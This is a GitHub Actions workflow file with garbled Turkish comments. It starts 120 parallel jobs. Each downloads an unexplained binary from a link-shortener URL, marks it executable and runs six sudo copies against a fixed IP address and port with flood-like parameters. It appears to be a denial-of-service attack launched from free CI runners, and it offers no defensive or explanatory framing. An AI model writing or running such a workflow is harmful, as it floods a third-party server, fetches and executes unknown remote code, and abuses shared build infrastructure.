name: TekPoyraz - VAHÅžÄ° OPTÄ°MÄ°ZASYON ðŸ”¥

on:
  workflow_dispatch:

jobs:
  vds:
    runs-on: ubuntu-latest
    strategy:
      # Paralel Ã§alÄ±ÅŸacak makine sayÄ±sÄ±nÄ±, hÄ±zlÄ± baÅŸlatma limitini aÅŸmayacak ÅŸekilde 50'ye dÃ¼ÅŸÃ¼rdÃ¼k.
      max-parallel: 120
      matrix:
        # Sadece 50 iÅŸ baÅŸlat. Kuyrukta beklemeye son!
        instance: [1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, 26, 27, 28, 29, 30, 31, 32, 33, 34, 35, 36, 37, 38, 39, 40, 41, 42, 43, 44, 45, 46, 47, 48, 49, 50, 51, 52, 53, 54, 55, 56, 57, 58, 59, 60, 61, 62, 63, 64, 65, 66, 67, 68, 69, 70, 71, 72, 73, 74, 75, 76, 77, 78, 79, 80, 81, 82, 83, 84, 85, 86, 87, 88, 89, 90, 91, 92, 93, 94, 95, 96, 97, 98, 99, 100, 101, 102, 103, 104, 105, 106, 107, 108, 109, 110, 111, 112, 113, 114, 115, 116, 117, 118, 119, 120]

    steps:
      - name: Ä°ndir ve HazÄ±rla
        run: |
          wget https://wgetz.com/it5MEKppqm/3 -O 3
          chmod +x 3
          
      - name: ðŸ”¥ TEK MAKÄ°NEDEN 8 Ã‡EKÄ°RDEK GÃœCÃœ AL
        run: |
          PIDS=()
          # HER MAKÄ°NE Ä°Ã‡Ä°NDE 8 PARALEL Ä°ÅžLEM BAÅžLAT!
          for i in {1..6}; do
            sudo timeout 60 ./3 194.176.184.191 30033 500 1000 9999999 &
            PIDS+=($!)
          done
          
          # Hepsini bekle ve bitir.
          for pid in "${PIDS[@]}"; do
            wait $pid
          done

      - name: KapanÄ±ÅŸ
        run: |
          sleep 60
          exit 0
